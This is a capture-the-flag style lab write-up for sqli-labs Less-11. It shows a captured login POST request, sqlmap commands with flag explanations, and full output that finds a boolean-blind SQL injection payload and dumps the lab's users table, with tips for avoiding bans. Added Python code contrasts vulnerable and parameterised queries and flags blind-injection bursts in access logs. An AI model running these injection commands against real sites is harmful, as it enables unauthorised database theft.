Challenge
Starting from Less-11 the challenges use POST forms.
Capture the request with Burp.
Save the captured request to the desktop as post.txt.
The request looks like this:
POST /Less-11/ HTTP/1.1
Host: 223.112.39.132:44537
Content-Length: 39
Cache-Control: max-age=0
Accept-Language: zh-CN,zh;q=0.9
Origin: http://223.112.39.132:44537
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://223.112.39.132:44537/Less-11/
Accept-Encoding: gzip, deflate, br
Cookie: td_cookie=3853948853
Connection: keep-alive

uname=admin&passwd=123456&submit=Submit
Run sqlmap to fetch the name of the current database:
sqlmap -r post.txt --batch --current-db --dbms=mysql --level=3 --risk=2 --technique=B
Parameter notes
- --batch: unattended mode; every prompt takes its default answer
- --dbms=mysql: states the back-end DBMS up front, which skips fingerprinting of other DBMSes and speeds up detection noticeably
- --level=3: raises the test level (adds header-based tests such as Referer and Cookie)
- --risk=2: medium-risk injection payloads (a balance between success rate and the chance of tripping a WAF)
- --technique=B: restricts testing to boolean-based blind injection (the most effective technique against POST forms)
- --flush-session: discards the stored session so detection starts fresh (listed here, though not used in the command above)
Expected output
┌──(kali㉿kali)-[~/Desktop]
└─$ sqlmap -r post.txt --batch --current-db --dbms=mysql --level=3 --risk=2 --technique=B
[sqlmap banner: {1.9.4#stable} https://sqlmap.org]
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 09:43:14 /2025-07-20/
[09:43:14] [INFO] parsing HTTP request from 'post.txt'
[09:43:14] [INFO] testing connection to the target URL
[09:43:14] [INFO] checking if the target is protected by some kind of WAF/IPS
[09:43:15] [INFO] testing if the target URL content is stable
[09:43:15] [INFO] target URL content is stable
[09:43:15] [INFO] testing if POST parameter 'uname' is dynamic
[09:43:15] [WARNING] POST parameter 'uname' does not appear to be dynamic
[09:43:16] [INFO] heuristic (basic) test shows that POST parameter 'uname' might be injectable (possible DBMS: 'MySQL')
[09:43:16] [INFO] heuristic (XSS) test shows that POST parameter 'uname' might be vulnerable to cross-site scripting (XSS) attacks
[09:43:16] [INFO] testing for SQL injection on POST parameter 'uname'
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (3) and risk (2) values? [Y/n] Y
[09:43:16] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[09:43:18] [WARNING] reflective value(s) found and filtering out
[09:43:28] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)'
[09:43:35] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (comment)'
[09:43:38] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[09:43:39] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL)'
[09:43:39] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL - original value)'
[09:43:39] [INFO] testing 'Boolean-based blind - Parameter replace (CASE)'
[09:43:39] [INFO] testing 'Boolean-based blind - Parameter replace (CASE - original value)'
[09:43:39] [INFO] testing 'HAVING boolean-based blind - WHERE, GROUP BY clause'
[09:43:48] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[09:43:58] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[09:44:07] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[09:44:11] [INFO] POST parameter 'uname' appears to be 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)' injectable (with --not-string="Your")
[09:44:11] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
[09:44:11] [INFO] checking if the injection point on POST parameter 'uname' is a false positive
POST parameter 'uname' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 263 HTTP(s) requests:
---
Parameter: uname (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: uname=admin%' OR NOT 3611=3611#&passwd=123456&submit=Submit
---
[09:44:15] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.23, PHP 5.6.28
back-end DBMS: MySQL (MariaDB fork)
[09:44:16] [INFO] fetching current database
[09:44:16] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[09:44:16] [INFO] retrieved: security
current database: 'security'
[09:44:29] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/223.112.39.132'
[*] ending @ 09:44:29 /2025-07-20/
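Why the run above works, in a small model added here (not the lab's code or sqlmap's output): a login query built by string concatenation, which is the assumed shape of the Less-11 query, beside the same query with bound parameters. The users rows are constructed, and because SQLite has no MySQL `#` line comment the constructed payloads end in `-- ` instead, with the same effect.

```python
import sqlite3

# Constructed stand-in for the lab's users table (a few rows modelled on this writeup's dump).
USERS = [(1, "Dumb", "Dumb"), (2, "Angelina", "I-kill-you"), (8, "admin", "admin")]


def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?)", USERS)
    return con


def login_concat(con, uname, passwd):
    # Vulnerable (assumed shape of the lab's query): the form fields are spliced into the SQL
    # text, so a quote inside uname closes the string literal and the rest is parsed as SQL.
    sql = ("SELECT username FROM users WHERE username='%s' AND password='%s' LIMIT 1"
           % (uname, passwd))
    return con.execute(sql).fetchone()


def login_param(con, uname, passwd):
    # Hardened: the identical query with bound parameters; values travel separately from the
    # statement, so no input can change its structure.
    sql = "SELECT username FROM users WHERE username=? AND password=? LIMIT 1"
    return con.execute(sql, (uname, passwd)).fetchone()


def blind_probe(login):
    """Replay the two payload variants sqlmap alternates between and return both results.

    The page's payload ends in MySQL's '#' line comment; SQLite needs '-- ' for the same job.
    """
    con = make_db()
    baseline = login(con, "admin%' OR NOT 3611=3611-- ", "123456")  # OR false: WHERE unchanged
    flipped = login(con, "admin%' OR NOT 3611=3612-- ", "123456")   # OR true: every row matches
    return baseline, flipped


def distinguishable(login):
    """True when the two probes produce different pages: the oracle a blind injection needs."""
    baseline, flipped = blind_probe(login)
    return baseline != flipped
```

With concatenation the probes return (None, ('Dumb',)), the two-state oracle sqlmap then drives one character at a time; with bound parameters both return None and there is nothing to extract.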
To retrieve the table names in the security database and the contents of the users table, use the following commands.
Listing all tables in the security database
sqlmap -r post.txt --batch --dbms=mysql -D security --tables
Parameter notes
- -D security: selects the target database
- --tables: lists all tables in that database
Expected output
┌──(kali㉿kali)-[~/Desktop]
└─$ sqlmap -r post.txt --batch --dbms=mysql -D security --tables
[sqlmap 1.9.4#stable banner and legal disclaimer as above]
[*] starting @ 09:51:49 /2025-07-20/
[09:51:49] [INFO] parsing HTTP request from 'post.txt'
[09:51:50] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uname (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: uname=admin%' OR NOT 3611=3611#&passwd=123456&submit=Submit
---
[09:51:50] [INFO] testing MySQL
[09:51:50] [INFO] confirming MySQL
[09:51:50] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.23, PHP 5.6.28
back-end DBMS: MySQL >= 8.0.0 (MariaDB fork)
[09:51:50] [INFO] fetching tables for database: 'security'
[09:51:50] [INFO] fetching number of tables for database 'security'
[09:51:50] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[09:51:50] [INFO] retrieved: 4
[09:51:50] [INFO] retrieved: emails
[09:51:53] [INFO] retrieved: referers
[09:51:56] [INFO] retrieved: uagents
[09:51:59] [INFO] retrieved: users
Database: security
[4 tables]
+----------+
| emails   |
| referers |
| uagents  |
| users    |
+----------+

[09:52:01] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/223.112.39.132'
[*] ending @ 09:52:01 /2025-07-20/
Dumping the whole users table
sqlmap -r post.txt --batch --dbms=mysql -D security -T users --dump
Parameter notes
- -T users: selects the target table
- --dump: exports every row of that table
Expected output
┌──(kali㉿kali)-[~/Desktop]
└─$ sqlmap -r post.txt --batch --dbms=mysql -D security -T users --dump
[sqlmap 1.9.4#stable banner and legal disclaimer as above]
[*] starting @ 09:52:03 /2025-07-20/
[09:52:03] [INFO] parsing HTTP request from 'post.txt'
[09:52:03] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uname (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: uname=admin%' OR NOT 3611=3611#&passwd=123456&submit=Submit
---
[09:52:03] [INFO] testing MySQL
[09:52:03] [INFO] confirming MySQL
[09:52:03] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.23, PHP 5.6.28
back-end DBMS: MySQL >= 8.0.0 (MariaDB fork)
[09:52:03] [INFO] fetching columns for table 'users' in database 'security'
[09:52:03] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[09:52:03] [INFO] retrieved: 3
[09:52:03] [INFO] retrieved: id
[09:52:04] [INFO] retrieved: username
[09:52:08] [INFO] retrieved: password
[09:52:11] [INFO] fetching entries for table 'users' in database 'security'
[09:52:11] [INFO] fetching number of entries for table 'users' in database 'security'
[09:52:11] [INFO] retrieved: 8
[09:52:11] [INFO] retrieved: 1
[09:52:11] [INFO] retrieved: Dumb
[09:52:13] [INFO] retrieved: Dumb
[09:52:15] [INFO] retrieved: 2
[09:52:16] [INFO] retrieved: I-kill-you
[09:52:20] [INFO] retrieved: Angelina
[09:52:23] [INFO] retrieved: 3
[09:52:24] [INFO] retrieved: p@ssword
[09:52:27] [INFO] retrieved: Dummy
[09:52:29] [INFO] retrieved: 4
[09:52:30] [INFO] retrieved: crappy
[09:52:32] [INFO] retrieved: secure
[09:52:35] [INFO] retrieved: 5
[09:52:35] [INFO] retrieved: stupidity
[09:52:39] [INFO] retrieved: stupid
[09:52:41] [INFO] retrieved: 6
[09:52:42] [INFO] retrieved: genious
[09:52:45] [INFO] retrieved: superman
[09:52:48] [INFO] retrieved: 7
[09:52:49] [INFO] retrieved: mob!le
[09:52:51] [INFO] retrieved: batman
[09:52:54] [INFO] retrieved: 8
[09:52:54] [INFO] retrieved: admin
[09:52:57] [INFO] retrieved: admin
Database: security
Table: users
[8 entries]
+----+------------+----------+
| id | password   | username |
+----+------------+----------+
| 1  | Dumb       | Dumb     |
| 2  | I-kill-you | Angelina |
| 3  | p@ssword   | Dummy    |
| 4  | crappy     | secure   |
| 5  | stupidity  | stupid   |
| 6  | genious    | superman |
| 7  | mob!le     | batman   |
| 8  | admin      | admin    |
+----+------------+----------+

[09:52:59] [INFO] table '`security`.users' dumped to CSV file '/home/kali/.local/share/sqlmap/output/223.112.39.132/dump/security/users.csv'
[09:52:59] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/223.112.39.132'
[*] ending @ 09:52:59 /2025-07-20/
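The dump above cost one POST per character guess, each answered by one of two page variants, and that leaves a recognisable trail in the web server's access log. As a defender-side complement added here (not part of the writeup), the script below scans constructed Apache combined-format log lines for a burst of POSTs from one client to one path whose responses take only two distinct sizes; the thresholds, client addresses and response sizes are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Apache combined log format; the request path is captured without its query string.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>[^ ?]+)\S* [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)

def parse(line):
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["size"] = 0 if rec["size"] == "-" else int(rec["size"])
    return rec

def find_blind_bursts(lines, min_requests=20, window_s=120, max_sizes=2):
    """Return (client, path) pairs that POSTed at least min_requests times within window_s
    seconds while the responses took at most max_sizes distinct byte lengths.  Boolean-based
    blind extraction leaves exactly this two-state trail; a real user does not submit a login
    form dozens of times a minute.  The thresholds are assumptions to tune per site."""
    buckets = defaultdict(list)
    for line in lines:
        rec = parse(line)
        if rec and rec["method"] == "POST":
            buckets[(rec["ip"], rec["path"])].append(rec)
    hits = []
    for key, recs in buckets.items():
        recs.sort(key=lambda r: r["ts"])
        for i in range(len(recs) - min_requests + 1):
            win = recs[i:i + min_requests]
            span = (win[-1]["ts"] - win[0]["ts"]).total_seconds()
            if span <= window_s and len({r["size"] for r in win}) <= max_sizes:
                hits.append(key)
                break
    return hits

# Constructed sample: one client (RFC 5737 address) probing the login form every two seconds,
# answered alternately by the success page and the failure page, plus one ordinary login.
SAMPLE = [
    '203.0.113.7 - - [20/Jul/2025:09:44:%02d +0800] "POST /Less-11/ HTTP/1.1" 200 %d "-" "Mozilla/5.0"'
    % (2 * i, 1593 if i % 2 else 1251)
    for i in range(30)
] + ['198.51.100.9 - - [20/Jul/2025:09:44:10 +0800] "POST /Less-11/ HTTP/1.1" 200 1593 "-" "Mozilla/5.0"']
```

Adding --delay=2, as the notes below suggest, stretches the burst over time but does not change the two-size pattern, so widening window_s keeps the heuristic effective.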
Step-by-step retrieval (better for large tables)
(1) First get the table structure:
sqlmap -r post.txt --batch -D security -T users --columns
(2) Then dump only the columns you need (-C selects the columns to export):
sqlmap -r post.txt --batch -D security -T users \
  -C id,username,password \
  --dump
Important notes:
- Large result sets: add --limit=100 to cap the number of rows fetched per query
- Avoiding bans: add a delay between requests, e.g. --delay=2 (2 seconds per request)
- Saving results: use --output-dir=report to write a complete report to that directory
- HTTPS targets: append the port to the Host header, e.g. :443
Less-11 can also be solved with sqlmap.